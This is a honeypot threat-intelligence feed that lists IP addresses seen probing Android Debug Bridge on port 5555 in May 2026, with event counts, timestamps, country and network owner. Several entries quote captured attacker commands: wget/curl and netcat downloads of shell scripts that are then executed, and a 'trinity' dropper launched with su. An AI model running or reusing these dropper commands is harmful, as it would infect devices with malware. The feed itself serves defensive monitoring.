IPv4	64.62.156.231	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-17T15:35:28.000Z \| last_seen=2026-05-17T15:36:30.763Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	67.83.159.130	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=6128; asn_org=Cablevision Systems Corp.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-17T15:20:44.000Z \| last_seen=2026-05-17T15:30:56.367Z \| ports=5555 \| cc=US \| asn=6128 \| org=Cablevision Systems Corp.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	88.247.182.131	Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=TR; asn=9121; asn_org=Turk Telekom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=59 \| first_seen=2026-05-17T20:07:47.000Z \| last_seen=2026-05-17T20:19:10.692Z \| ports=5555 \| cc=TR \| asn=9121 \| org=Turk Telekom \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc,71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-17
IPv4	60.20.164.77	Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=41 \| first_seen=2026-05-17T22:09:26.000Z \| last_seen=2026-05-17T22:29:06.907Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-17
IPv4	138.197.183.124	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-17T23:54:41.000Z \| last_seen=2026-05-18T00:04:55.264Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	185.254.75.30	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=DE; asn=43357; asn_org=Owl Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-17T23:17:02.000Z \| last_seen=2026-05-17T23:27:03.447Z \| ports=5555 \| cc=DE \| asn=43357 \| org=Owl Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	205.210.31.183	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-18T01:49:20.000Z \| last_seen=2026-05-18T02:00:48.212Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	64.62.156.212	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-18T01:18:49.000Z \| last_seen=2026-05-18T01:28:57.188Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	64.62.156.219	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-18T01:17:08.000Z \| last_seen=2026-05-18T01:18:18.219Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	206.81.19.43	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DE; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=6 \| first_seen=2026-05-18T02:27:21.000Z \| last_seen=2026-05-18T02:28:27.441Z \| ports=5555 \| cc=DE \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	4.227.178.208	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-18T02:35:15.000Z \| last_seen=2026-05-18T02:47:52.891Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	208.84.100.117	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=22295; asn_org=Advin Services LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-18T07:45:01.000Z \| last_seen=2026-05-18T07:55:07.830Z \| ports=5555 \| cc=US \| asn=22295 \| org=Advin Services LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	152.53.81.25	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=214996; asn_org=netcup GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-18T10:18:10.000Z \| last_seen=2026-05-18T19:43:35.779Z \| ports=5555 \| cc=US \| asn=214996 \| org=netcup GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	8.216.65.20	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=JP; asn=45102; asn_org=Alibaba US Technology Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-18T10:15:45.000Z \| last_seen=2026-05-18T10:16:49.592Z \| ports=5555 \| cc=JP \| asn=45102 \| org=Alibaba US Technology Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	2.59.156.163	Attacker IP • ADB / seen in ADBHoney; events=1; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-18T04:17:06.630Z \| last_seen=2026-05-18T19:13:40.260Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	79.124.60.146	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=50360; asn_org=Tamatiya EOOD; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-18T12:28:32.000Z \| last_seen=2026-05-18T12:29:42.887Z \| ports=5555 \| cc=BG \| asn=50360 \| org=Tamatiya EOOD	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	161.35.109.215	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-18T14:43:34.000Z \| last_seen=2026-05-18T14:44:38.630Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	212.83.160.70	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=12876; asn_org=Scaleway SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-18T14:34:10.000Z \| last_seen=2026-05-18T14:35:19.222Z \| ports=5555 \| cc=FR \| asn=12876 \| org=Scaleway SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	64.62.197.192	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-18T15:10:02.000Z \| last_seen=2026-05-18T15:11:03.115Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	45.33.40.18	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-18T16:01:44.000Z \| last_seen=2026-05-21T16:00:11.759Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-18
IPv4	114.98.177.182	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-19T01:55:38.000Z \| last_seen=2026-05-26T19:25:35.427Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	147.185.132.234	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-19T02:08:41.000Z \| last_seen=2026-05-19T02:20:15.336Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	159.89.130.253	Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-19T03:44:12.000Z \| last_seen=2026-05-20T16:57:46.462Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	65.49.1.122	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=33 \| first_seen=2026-05-19T03:45:47.000Z \| last_seen=2026-05-28T14:48:09.791Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	65.49.1.128	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-19T03:45:01.000Z \| last_seen=2026-05-19T03:46:09.779Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	82.23.163.237	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=NL; asn=57043; asn_org=Hostkey B.v.; adb_cmd_hits=6; cmd="cd /data/local/tmp/; busybox wget http://82.23.163.237/w.sh; sh w.sh; curl http://82.23.163.237/c.sh; sh c.sh; wget http://82.23.163.237/wget.sh; sh wget.sh; cu" Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-19T03:07:44.000Z \| last_seen=2026-05-19T03:09:38.363Z \| ports=5555 \| cc=NL \| asn=57043 \| org=Hostkey B.v.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	46.8.89.87	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RU; asn=60931; asn_org=LAN-Service Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-19T10:40:49.000Z \| last_seen=2026-05-19T10:41:53.714Z \| ports=5555 \| cc=RU \| asn=60931 \| org=LAN-Service Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	151.243.11.38	Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=AE; asn=209630; asn_org=LLC Vash Kredit Bank; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-19T11:04:43.000Z \| last_seen=2026-05-19T12:55:43.033Z \| ports=5555 \| cc=AE \| asn=209630 \| org=LLC Vash Kredit Bank	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	45.95.147.229	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=664 \| first_seen=2026-05-19T12:38:17.000Z \| last_seen=2026-05-30T10:40:51.210Z \| ports=5555 \| cc=NL \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	52.53.124.113	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=US; asn=16509; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-19T12:46:21.000Z \| last_seen=2026-05-19T12:56:36.722Z \| ports=5555 \| cc=US \| asn=16509 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	71.6.233.2	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=10439; asn_org=CariNet, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-19T12:46:06.000Z \| last_seen=2026-05-19T12:47:08.431Z \| ports=5555 \| cc=US \| asn=10439 \| org=CariNet, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	81.161.239.16	Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=215292; asn_org=Gravhosting LLC; adb_cmd_hits=0; cmd="cd /data/local/tmp/ && busybox nc -w 2 31.56.209.8 6782 > android.sh 2>/dev/null \|\| nc -w 2 31.56.209.8 6782 > android.sh 2>/dev/null && chmod 755 android.sh &&" Observed in ADBHoney telemetry for 2026-05. events=15 \| first_seen=2026-05-19T12:08:24.000Z \| last_seen=2026-05-19T12:10:20.754Z \| ports=5555 \| cc=US \| asn=215292 \| org=Gravhosting LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	104.131.20.161	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-19T13:46:46.000Z \| last_seen=2026-05-19T13:47:52.368Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	85.11.167.224	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=BG; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=70 \| first_seen=2026-05-19T14:47:47.000Z \| last_seen=2026-05-24T07:49:32.200Z \| ports=5555 \| cc=BG \| asn=213438 \| org=ColocaTel Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	160.119.76.4	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SC; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=840 \| first_seen=2026-05-16T22:43:18.000Z \| last_seen=2026-05-29T01:56:34.713Z \| ports=5555 \| cc=SC \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	184.105.139.68	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-19T15:16:02.000Z \| last_seen=2026-05-19T15:26:09.611Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	184.105.139.80	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-19T15:14:51.000Z \| last_seen=2026-05-19T15:15:51.565Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	185.224.128.16	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=10 \| first_seen=2026-05-19T16:49:14.000Z \| last_seen=2026-05-24T19:06:35.986Z \| ports=5555 \| cc=NL \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	23.94.204.22	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=36352; asn_org=HostPapa; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-19T18:33:24.000Z \| last_seen=2026-05-19T18:38:25.271Z \| ports=5555 \| cc=US \| asn=36352 \| org=HostPapa	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	87.251.64.158	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=PL; asn=200730; asn_org=ISAEV Igor; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-19T18:53:09.000Z \| last_seen=2026-05-19T18:54:19.143Z \| ports=5555 \| cc=PL \| asn=200730 \| org=ISAEV Igor	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	125.40.221.117	Attacker IP • ADB / seen in ADBHoney; events=55; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0; cmd="/data/local/tmp/nohup su -c /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=62 \| first_seen=2026-05-19T19:56:52.000Z \| last_seen=2026-05-19T20:09:59.825Z \| ports=5555 \| cc=CN \| asn=4837 \| org=CHINA UNICOM China169 Backbone \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-19
IPv4	202.71.141.170	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=8881; asn_org=1&1 Versatel GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-19T19:54:34.000Z \| last_seen=2026-05-19T19:55:41.830Z \| ports=5555 \| cc=DE \| asn=8881 \| org=1&1 Versatel GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	198.235.24.242	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-19T21:07:00.000Z \| last_seen=2026-05-19T21:18:41.504Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-19
IPv4	109.205.211.99	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=AZ; asn=201814; asn_org=MEVSPACE sp. z o.o.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=1472 \| first_seen=2026-05-19T23:16:48.000Z \| last_seen=2026-05-26T09:28:20.051Z \| ports=5555 \| cc=AZ \| asn=201814 \| org=MEVSPACE sp. z o.o.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	206.212.255.126	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=13737; asn_org=Interconnecx, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=44 \| first_seen=2026-05-20T00:38:03.000Z \| last_seen=2026-05-31T20:30:08.501Z \| ports=5555 \| cc=US \| asn=13737 \| org=Interconnecx, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	180.93.228.246	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=VN; asn=7602; asn_org=Sai gon Postel Corporation; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-20T04:42:47.000Z \| last_seen=2026-05-20T04:43:50.191Z \| ports=5555 \| cc=VN \| asn=7602 \| org=Sai gon Postel Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	59.188.170.234	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=HK; asn=9269; asn_org=Hong Kong Broadband Network Ltd.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-20T05:29:01.000Z \| last_seen=2026-05-20T05:30:34.072Z \| ports=5555 \| cc=HK \| asn=9269 \| org=Hong Kong Broadband Network Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	198.199.65.51	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-20T09:33:00.000Z \| last_seen=2026-05-20T09:34:08.306Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	206.189.233.77	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-20T09:04:49.000Z \| last_seen=2026-05-20T09:05:55.231Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	65.49.1.66	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-20T11:24:04.000Z \| last_seen=2026-05-30T12:22:55.262Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	65.49.1.74	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-20T11:22:36.000Z \| last_seen=2026-05-20T11:23:38.355Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	91.24.1.201	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=DE; asn=3320; asn_org=Deutsche Telekom AG; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-20T11:06:48.000Z \| last_seen=2026-05-20T11:08:22.727Z \| ports=5555 \| cc=DE \| asn=3320 \| org=Deutsche Telekom AG	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	139.144.239.78	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-20T15:58:48.000Z \| last_seen=2026-05-20T15:59:53.682Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	172.237.155.240	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-20T15:59:17.000Z \| last_seen=2026-05-20T16:00:21.575Z \| ports=5555 \| cc=US \| asn=63949 \| org=Akamai Connected Cloud	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	66.132.172.106	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-20T15:02:37.000Z \| last_seen=2026-05-20T15:04:01.387Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	66.132.172.16	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=53 \| first_seen=2026-05-20T15:02:54.000Z \| last_seen=2026-05-31T00:33:59.100Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	66.132.195.30	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-20T15:02:24.000Z \| last_seen=2026-05-20T15:03:28.486Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	68.183.84.184	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=IN; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-20T18:08:01.000Z \| last_seen=2026-05-20T18:18:18.941Z \| ports=5555 \| cc=IN \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	59.60.122.138	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-20T22:15:31.000Z \| last_seen=2026-05-20T22:16:38.115Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-20
IPv4	205.210.31.42	Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=24 \| first_seen=2026-05-20T23:31:23.000Z \| last_seen=2026-05-20T23:42:49.942Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	66.132.195.157	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=Censys, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-21T00:09:13.000Z \| last_seen=2026-05-21T00:10:54.039Z \| ports=5555 \| cc=US \| asn=398324 \| org=Censys, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	77.91.118.50	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=RU; asn=209896; asn_org=Contrust Solutions S.R.L.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=95 \| first_seen=2026-05-21T00:12:57.000Z \| last_seen=2026-05-29T19:55:29.247Z \| ports=5555 \| cc=US,RU \| asn=209896 \| org=Contrust Solutions S.R.L.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
IPv4	138.197.171.153	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-21T04:07:28.000Z \| last_seen=2026-05-21T04:18:12.338Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-21
